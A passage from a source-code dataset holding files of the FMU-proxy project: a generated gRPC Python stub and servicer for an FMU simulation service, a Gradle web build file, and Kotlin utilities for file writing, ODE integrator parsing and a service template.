@CommandLine.Option(names = [\"-h\", \"--help\"], description = [\"Prints this message and quits.\"], usageHelp = true)\n var helpRequested = false\n\n @CommandLine.Option(names = [\"-fmu\", \"--fmuPath\"], description = [\"Path to the fmu.\"], required = true)\n lateinit var fmuPath: File\n\n @CommandLine.Option(names = [\"-out\", \"--output\"], description = [\"Specify where to copy the generated .jar (optional).\"])\n var out: File? = null\n\n override fun run() {\n\n ExecutableGenerator(fmuPath).generate(out)\n\n }\n}\n\n\n" }, { "alpha_fraction": 0.72469562292099, "alphanum_fraction": 0.7296720743179321, "avg_line_length": 44.93061065673828, "blob_id": "d427c7e5fbbd5d915606ca167d280da23eb5a6c6", "content_id": "690605f2f9b0140917bd36c43be870c226a7cde4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22506, "license_type": "permissive", "max_line_length": 86, "num_lines": 490, "path": "/python/grpc-client/service_pb2_grpc.py", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!\nimport grpc\n\nimport definitions_pb2 as definitions__pb2\nfrom google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2\n\n\nclass FmuServiceStub(object):\n # missing associated documentation comment in .proto file\n pass\n\n def __init__(self, channel):\n \"\"\"Constructor.\n\n Args:\n channel: A grpc.Channel.\n \"\"\"\n self.GetModelDescriptionXml = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/GetModelDescriptionXml',\n request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,\n response_deserializer=definitions__pb2.Str.FromString,\n )\n self.GetModelDescription = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/GetModelDescription',\n request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,\n response_deserializer=definitions__pb2.ModelDescription.FromString,\n )\n self.CreateInstanceFromCS = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/CreateInstanceFromCS',\n request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,\n response_deserializer=definitions__pb2.UInt.FromString,\n )\n self.CreateInstanceFromME = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/CreateInstanceFromME',\n request_serializer=definitions__pb2.Solver.SerializeToString,\n response_deserializer=definitions__pb2.UInt.FromString,\n )\n self.GetCurrentTime = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/GetCurrentTime',\n request_serializer=definitions__pb2.UInt.SerializeToString,\n response_deserializer=definitions__pb2.Real.FromString,\n )\n self.IsTerminated = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/IsTerminated',\n request_serializer=definitions__pb2.UInt.SerializeToString,\n response_deserializer=definitions__pb2.Bool.FromString,\n )\n self.CanGetAndSetFMUstate = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/CanGetAndSetFMUstate',\n request_serializer=definitions__pb2.UInt.SerializeToString,\n response_deserializer=definitions__pb2.Bool.FromString,\n )\n self.Init = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/Init',\n request_serializer=definitions__pb2.InitRequest.SerializeToString,\n response_deserializer=definitions__pb2.StatusResponse.FromString,\n )\n self.Step = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/Step',\n request_serializer=definitions__pb2.StepRequest.SerializeToString,\n response_deserializer=definitions__pb2.StepResult.FromString,\n )\n self.Terminate = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/Terminate',\n request_serializer=definitions__pb2.UInt.SerializeToString,\n response_deserializer=definitions__pb2.StatusResponse.FromString,\n )\n self.Reset = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/Reset',\n request_serializer=definitions__pb2.UInt.SerializeToString,\n response_deserializer=definitions__pb2.StatusResponse.FromString,\n )\n self.ReadInteger = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/ReadInteger',\n request_serializer=definitions__pb2.ReadRequest.SerializeToString,\n response_deserializer=definitions__pb2.IntRead.FromString,\n )\n self.ReadReal = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/ReadReal',\n request_serializer=definitions__pb2.ReadRequest.SerializeToString,\n response_deserializer=definitions__pb2.RealRead.FromString,\n )\n self.ReadString = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/ReadString',\n request_serializer=definitions__pb2.ReadRequest.SerializeToString,\n response_deserializer=definitions__pb2.StrRead.FromString,\n )\n self.ReadBoolean = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/ReadBoolean',\n request_serializer=definitions__pb2.ReadRequest.SerializeToString,\n response_deserializer=definitions__pb2.BoolRead.FromString,\n )\n self.BulkReadInteger = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/BulkReadInteger',\n request_serializer=definitions__pb2.BulkReadRequest.SerializeToString,\n response_deserializer=definitions__pb2.IntListRead.FromString,\n )\n self.BulkReadReal = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/BulkReadReal',\n request_serializer=definitions__pb2.BulkReadRequest.SerializeToString,\n response_deserializer=definitions__pb2.RealListRead.FromString,\n )\n self.BulkReadString = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/BulkReadString',\n request_serializer=definitions__pb2.BulkReadRequest.SerializeToString,\n response_deserializer=definitions__pb2.StrListRead.FromString,\n )\n self.BulkReadBoolean = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/BulkReadBoolean',\n request_serializer=definitions__pb2.BulkReadRequest.SerializeToString,\n response_deserializer=definitions__pb2.BoolListRead.FromString,\n )\n self.WriteInteger = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/WriteInteger',\n request_serializer=definitions__pb2.WriteIntRequest.SerializeToString,\n response_deserializer=definitions__pb2.StatusResponse.FromString,\n )\n self.WriteReal = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/WriteReal',\n request_serializer=definitions__pb2.WriteRealRequest.SerializeToString,\n response_deserializer=definitions__pb2.StatusResponse.FromString,\n )\n self.WriteString = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/WriteString',\n request_serializer=definitions__pb2.WriteStrRequest.SerializeToString,\n response_deserializer=definitions__pb2.StatusResponse.FromString,\n )\n self.WriteBoolean = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/WriteBoolean',\n request_serializer=definitions__pb2.WriteBoolRequest.SerializeToString,\n response_deserializer=definitions__pb2.StatusResponse.FromString,\n )\n self.BulkWriteInteger = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/BulkWriteInteger',\n request_serializer=definitions__pb2.BulkWriteIntRequest.SerializeToString,\n response_deserializer=definitions__pb2.StatusResponse.FromString,\n )\n self.BulkWriteReal = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/BulkWriteReal',\n request_serializer=definitions__pb2.BulkWriteRealRequest.SerializeToString,\n response_deserializer=definitions__pb2.StatusResponse.FromString,\n )\n self.BulkWriteString = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/BulkWriteString',\n request_serializer=definitions__pb2.BulkWriteStrRequest.SerializeToString,\n response_deserializer=definitions__pb2.StatusResponse.FromString,\n )\n self.BulkWriteBoolean = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/BulkWriteBoolean',\n request_serializer=definitions__pb2.BulkWriteBoolRequest.SerializeToString,\n response_deserializer=definitions__pb2.StatusResponse.FromString,\n )\n\n\nclass FmuServiceServicer(object):\n # missing associated documentation comment in .proto file\n pass\n\n def GetModelDescriptionXml(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def GetModelDescription(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def CreateInstanceFromCS(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def CreateInstanceFromME(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def GetCurrentTime(self, request, context):\n \"\"\"instance methods\n\n \"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def IsTerminated(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def CanGetAndSetFMUstate(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def Init(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def Step(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def Terminate(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def Reset(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def ReadInteger(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def ReadReal(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def ReadString(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def ReadBoolean(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def BulkReadInteger(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def BulkReadReal(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def BulkReadString(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def BulkReadBoolean(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def WriteInteger(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def WriteReal(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def WriteString(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def WriteBoolean(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def BulkWriteInteger(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def BulkWriteReal(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def BulkWriteString(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def BulkWriteBoolean(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n\ndef add_FmuServiceServicer_to_server(servicer, server):\n rpc_method_handlers = {\n 'GetModelDescriptionXml': grpc.unary_unary_rpc_method_handler(\n servicer.GetModelDescriptionXml,\n request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,\n response_serializer=definitions__pb2.Str.SerializeToString,\n ),\n 'GetModelDescription': grpc.unary_unary_rpc_method_handler(\n servicer.GetModelDescription,\n request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,\n response_serializer=definitions__pb2.ModelDescription.SerializeToString,\n ),\n 'CreateInstanceFromCS': grpc.unary_unary_rpc_method_handler(\n servicer.CreateInstanceFromCS,\n request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,\n response_serializer=definitions__pb2.UInt.SerializeToString,\n ),\n 'CreateInstanceFromME': grpc.unary_unary_rpc_method_handler(\n servicer.CreateInstanceFromME,\n request_deserializer=definitions__pb2.Solver.FromString,\n response_serializer=definitions__pb2.UInt.SerializeToString,\n ),\n 'GetCurrentTime': grpc.unary_unary_rpc_method_handler(\n servicer.GetCurrentTime,\n request_deserializer=definitions__pb2.UInt.FromString,\n response_serializer=definitions__pb2.Real.SerializeToString,\n ),\n 'IsTerminated': grpc.unary_unary_rpc_method_handler(\n servicer.IsTerminated,\n request_deserializer=definitions__pb2.UInt.FromString,\n response_serializer=definitions__pb2.Bool.SerializeToString,\n ),\n 'CanGetAndSetFMUstate': grpc.unary_unary_rpc_method_handler(\n servicer.CanGetAndSetFMUstate,\n request_deserializer=definitions__pb2.UInt.FromString,\n response_serializer=definitions__pb2.Bool.SerializeToString,\n ),\n 'Init': grpc.unary_unary_rpc_method_handler(\n servicer.Init,\n request_deserializer=definitions__pb2.InitRequest.FromString,\n response_serializer=definitions__pb2.StatusResponse.SerializeToString,\n ),\n 'Step': grpc.unary_unary_rpc_method_handler(\n servicer.Step,\n request_deserializer=definitions__pb2.StepRequest.FromString,\n response_serializer=definitions__pb2.StepResult.SerializeToString,\n ),\n 'Terminate': grpc.unary_unary_rpc_method_handler(\n servicer.Terminate,\n request_deserializer=definitions__pb2.UInt.FromString,\n response_serializer=definitions__pb2.StatusResponse.SerializeToString,\n ),\n 'Reset': grpc.unary_unary_rpc_method_handler(\n servicer.Reset,\n request_deserializer=definitions__pb2.UInt.FromString,\n response_serializer=definitions__pb2.StatusResponse.SerializeToString,\n ),\n 'ReadInteger': grpc.unary_unary_rpc_method_handler(\n servicer.ReadInteger,\n request_deserializer=definitions__pb2.ReadRequest.FromString,\n response_serializer=definitions__pb2.IntRead.SerializeToString,\n ),\n 'ReadReal': grpc.unary_unary_rpc_method_handler(\n servicer.ReadReal,\n request_deserializer=definitions__pb2.ReadRequest.FromString,\n response_serializer=definitions__pb2.RealRead.SerializeToString,\n ),\n 'ReadString': grpc.unary_unary_rpc_method_handler(\n servicer.ReadString,\n request_deserializer=definitions__pb2.ReadRequest.FromString,\n response_serializer=definitions__pb2.StrRead.SerializeToString,\n ),\n 'ReadBoolean': grpc.unary_unary_rpc_method_handler(\n servicer.ReadBoolean,\n request_deserializer=definitions__pb2.ReadRequest.FromString,\n response_serializer=definitions__pb2.BoolRead.SerializeToString,\n ),\n 'BulkReadInteger': grpc.unary_unary_rpc_method_handler(\n servicer.BulkReadInteger,\n request_deserializer=definitions__pb2.BulkReadRequest.FromString,\n response_serializer=definitions__pb2.IntListRead.SerializeToString,\n ),\n 'BulkReadReal': grpc.unary_unary_rpc_method_handler(\n servicer.BulkReadReal,\n request_deserializer=definitions__pb2.BulkReadRequest.FromString,\n response_serializer=definitions__pb2.RealListRead.SerializeToString,\n ),\n 'BulkReadString': grpc.unary_unary_rpc_method_handler(\n servicer.BulkReadString,\n request_deserializer=definitions__pb2.BulkReadRequest.FromString,\n response_serializer=definitions__pb2.StrListRead.SerializeToString,\n ),\n 'BulkReadBoolean': grpc.unary_unary_rpc_method_handler(\n servicer.BulkReadBoolean,\n request_deserializer=definitions__pb2.BulkReadRequest.FromString,\n response_serializer=definitions__pb2.BoolListRead.SerializeToString,\n ),\n 'WriteInteger': grpc.unary_unary_rpc_method_handler(\n servicer.WriteInteger,\n request_deserializer=definitions__pb2.WriteIntRequest.FromString,\n response_serializer=definitions__pb2.StatusResponse.SerializeToString,\n ),\n 'WriteReal': grpc.unary_unary_rpc_method_handler(\n servicer.WriteReal,\n request_deserializer=definitions__pb2.WriteRealRequest.FromString,\n response_serializer=definitions__pb2.StatusResponse.SerializeToString,\n ),\n 'WriteString': grpc.unary_unary_rpc_method_handler(\n servicer.WriteString,\n request_deserializer=definitions__pb2.WriteStrRequest.FromString,\n response_serializer=definitions__pb2.StatusResponse.SerializeToString,\n ),\n 'WriteBoolean': grpc.unary_unary_rpc_method_handler(\n servicer.WriteBoolean,\n request_deserializer=definitions__pb2.WriteBoolRequest.FromString,\n response_serializer=definitions__pb2.StatusResponse.SerializeToString,\n ),\n 'BulkWriteInteger': grpc.unary_unary_rpc_method_handler(\n servicer.BulkWriteInteger,\n request_deserializer=definitions__pb2.BulkWriteIntRequest.FromString,\n response_serializer=definitions__pb2.StatusResponse.SerializeToString,\n ),\n 'BulkWriteReal': grpc.unary_unary_rpc_method_handler(\n servicer.BulkWriteReal,\n request_deserializer=definitions__pb2.BulkWriteRealRequest.FromString,\n response_serializer=definitions__pb2.StatusResponse.SerializeToString,\n ),\n 'BulkWriteString': grpc.unary_unary_rpc_method_handler(\n servicer.BulkWriteString,\n request_deserializer=definitions__pb2.BulkWriteStrRequest.FromString,\n response_serializer=definitions__pb2.StatusResponse.SerializeToString,\n ),\n 'BulkWriteBoolean': grpc.unary_unary_rpc_method_handler(\n servicer.BulkWriteBoolean,\n request_deserializer=definitions__pb2.BulkWriteBoolRequest.FromString,\n response_serializer=definitions__pb2.StatusResponse.SerializeToString,\n ),\n }\n generic_handler = grpc.method_handlers_generic_handler(\n 'no.mechatronics.sfi.fmuproxy.grpc.FmuService', rpc_method_handlers)\n server.add_generic_rpc_handlers((generic_handler,))\n" }, { "alpha_fraction": 0.6505628228187561, "alphanum_fraction": 0.6805816292762756, "avg_line_length": 24.082353591918945, "blob_id": "42a2f71545bab44d210bd790c22166e13b8a8d43", "content_id": "50445e1854586e7f547c6e6120dbee401fcda47f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 2132, "license_type": "permissive", "max_line_length": 120, "num_lines": 85, "path": "/java/FMU-proxy/web/build.gradle", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "buildscript {\n repositories {\n jcenter()\n }\n\n dependencies {\n classpath 'org.akhikhl.gretty:gretty:2.0.0'\n }\n}\n\next.jetty94Version = '9.4.9.v20180320'\n\napply plugin: 'kotlin'\napply plugin: 'war'\napply plugin: 'org.akhikhl.gretty'\n\n\ndef snapshot = true\ndef fmi4j_version = snapshot ? fmi4j_snapshot_version : fmi4j_stable_version\n\ndependencies {\n\n providedCompile 'javax.servlet:servlet-api:2.2'\n providedCompile 'javax.servlet.jsp:jsp-api:2.2'\n providedCompile 'javax.enterprise:cdi-api:2.0'\n\n compile group: 'com.sun.faces', name: 'jsf-api', version: '2.2.17'\n runtime group: 'com.sun.faces', name: 'jsf-impl', version: '2.2.17'\n\n compile group: 'org.primefaces', name: 'primefaces', version: '6.2'\n\n compile group: 'com.google.code.gson', name: 'gson', version: '2.8.4'\n compile group: 'org.zeromq', name: 'jeromq', version: '0.4.3'\n\n implementation group: 'org.slf4j', name: 'slf4j-api', version: '1.7.25'\n runtime group: 'org.slf4j', name: 'slf4j-log4j12', version: '1.7.25'\n\n compile group: 'no.mechatronics.sfi.fmi4j', name: 'fmi-modeldescription', version: fmi4j_version, changing: snapshot\n\n}\n\ngretty {\n servletContainer = \"jetty9.4\"\n httpEnabled = true\n httpPort = 8080\n contextPath = \"/fmu-proxy\"\n logDir = \"$projectDir/logs\"\n}\n\ntask copyAvro(type: Copy) {\n\n from('../rpc-definitions/src/main/avro')\n into('src/main/webapp/resources/schemas/avro')\n include('*.avdl')\n\n}\n\ntask copyThrift(type: Copy) {\n\n from('../rpc-definitions/src/main/thrift')\n into('src/main/webapp/resources/schemas/thrift')\n include('*.thrift')\n\n}\n\ntask copyProto(type: Copy) {\n\n from('../rpc-definitions/src/main/proto')\n into('src/main/webapp/resources/schemas/proto')\n include('*.proto')\n\n}\n\ntask copyProtoZip(type: Zip) {\n\n from '../rpc-definitions/src/main/proto'\n include '*'\n archiveName 'fmu-proxy-generic-proto.zip'\n destinationDir(file('src/main/webapp/resources/schemas/proto/'))\n}\n\ncompileKotlin.dependsOn(copyAvro)\ncompileKotlin.dependsOn(copyThrift)\ncompileKotlin.dependsOn(copyProto)\ncompileKotlin.dependsOn(copyProtoZip)\n" }, { "alpha_fraction": 0.6843658089637756, "alphanum_fraction": 0.6890855431556702, "avg_line_length": 31.615385055541992, "blob_id": "ee8a0ad036f8c8e3fde1a89e3ecc08e7b374ab24", "content_id": "6a5f9ba4e41541e159e7c6e91183f0f4509c4369", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 1695, "license_type": "permissive", "max_line_length": 81, "num_lines": 52, "path": "/java/FMU-proxy/fmu-proxy-gen/src/main/kotlin/no/mechatronics/sfi/fmuproxy/utils/FileFuture.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology (NTNU)\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.utils\n\nimport java.io.File\n\n/**\n *\n * @author Lars Ivar Hatledal\n */\nclass FileFuture (\n val name: String,\n val text: String\n) {\n\n @JvmOverloads\n fun create(dir: File, fileName: String = name) : File {\n return File(dir, fileName).also {file ->\n if (!dir.exists()) {\n dir.mkdirs()\n }\n file.writeText(text)\n }\n }\n\n override fun toString(): String {\n return \"FileFuture(name='$name', text='$text')\"\n }\n\n}" }, { "alpha_fraction": 0.7076205015182495, "alphanum_fraction": 0.7122861742973328, "avg_line_length": 25.26530647277832, "blob_id": "9a968b1a59ce57f3a292072295b6d7d2b013f788", "content_id": "225a345cb95b32b7f36255dfa8e750713a944777", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 1286, "license_type": "permissive", "max_line_length": 75, "num_lines": 49, "path": "/java/FMU-proxy/fmu-proxy/src/main/kotlin/no/mechatronics/sfi/fmuproxy/solver/solver.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "package no.mechatronics.sfi.fmuproxy.solver\n\nimport com.google.gson.Gson\nimport com.google.gson.GsonBuilder\nimport org.apache.commons.math3.ode.FirstOrderIntegrator\nimport org.apache.commons.math3.ode.nonstiff.ClassicalRungeKuttaIntegrator\nimport org.apache.commons.math3.ode.nonstiff.EulerIntegrator\n\nprivate const val STEP_SIZE = \"step_size\"\n\nprivate val gson: Gson by lazy {\n GsonBuilder().create()\n}\n\nfun parseIntegrator(name: String, json: String): FirstOrderIntegrator? {\n return when(name.toLowerCase()) {\n \"euler\" -> eulerFromJson(json)\n \"rk4\" -> rk4FromJson(json)\n else -> null\n }\n}\n\nprivate fun eulerFromJson(json: String): EulerIntegrator? {\n\n @Suppress(\"UNCHECKED_CAST\")\n val settings = Gson().fromJson(json, Map::class.java) as Map<String, *>\n\n if (STEP_SIZE !in settings) {\n return null\n }\n\n val stepSize = settings[STEP_SIZE] as Double\n return EulerIntegrator(stepSize)\n\n}\n\nprivate fun rk4FromJson(json: String): ClassicalRungeKuttaIntegrator? {\n\n @Suppress(\"UNCHECKED_CAST\")\n val settings = gson.fromJson(json, Map::class.java) as Map<String, *>\n\n if (STEP_SIZE !in settings) {\n return null\n }\n\n val stepSize = settings[STEP_SIZE] as Double\n return ClassicalRungeKuttaIntegrator(stepSize)\n\n}" }, { "alpha_fraction": 0.7423007488250732, "alphanum_fraction": 0.7472826242446899, "avg_line_length": 37.034481048583984, "blob_id": "8ace9022036f92c1507994b8f18717d1bd34f3b2", "content_id": "b62b4758da16e341556353b615e630afb778726d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 2208, "license_type": "permissive", "max_line_length": 95, "num_lines": 58, "path": "/java/FMU-proxy/fmu-proxy-gen/src/main/resources/templates/server/Service.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology (NTNU)\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.grpc\n\nimport io.grpc.BindableService\nimport io.grpc.stub.StreamObserver\n\nimport no.mechatronics.sfi.fmi4j.common.FmiStatus\n\nimport no.mechatronics.sfi.fmuproxy.fmu.Fmus\nimport no.mechatronics.sfi.fmuproxy.grpc.services.GrpcFmuService\n\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\n\nclass {{fmuName}}Service: {{fmuName}}ServiceGrpc.{{fmuName}}ServiceImplBase(), GrpcFmuService {\n\n {{dynamicMethods}}\n\n companion object {\n val LOG: Logger = LoggerFactory.getLogger({{fmuName}}Service::class.java.simpleName)\n }\n\n}\n\ninternal fun FmiStatus.protoType(): Proto.Status {\n return when (this) {\n FmiStatus.OK -> Proto.Status.OK_STATUS\n FmiStatus.Warning -> Proto.Status.WARNING_STATUS\n FmiStatus.Discard -> Proto.Status.DISCARD_STATUS\n FmiStatus.Error -> Proto.Status.ERROR_STATUS\n FmiStatus.Fatal -> Proto.Status.FATAL_STATUS\n FmiStatus.Pending -> Proto.Status.PENDING_STATUS\n FmiStatus.NONE -> Proto.Status.UNRECOGNIZED\n }\n}\n\n\n" }, { "alpha_fraction": 0.5336081385612488, "alphanum_fraction": 0.5396322011947632, "avg_line_length": 32.721923828125, "blob_id": "dd8cc8ee6fdbe130f6d009d86b77f653c746ab59", "content_id": 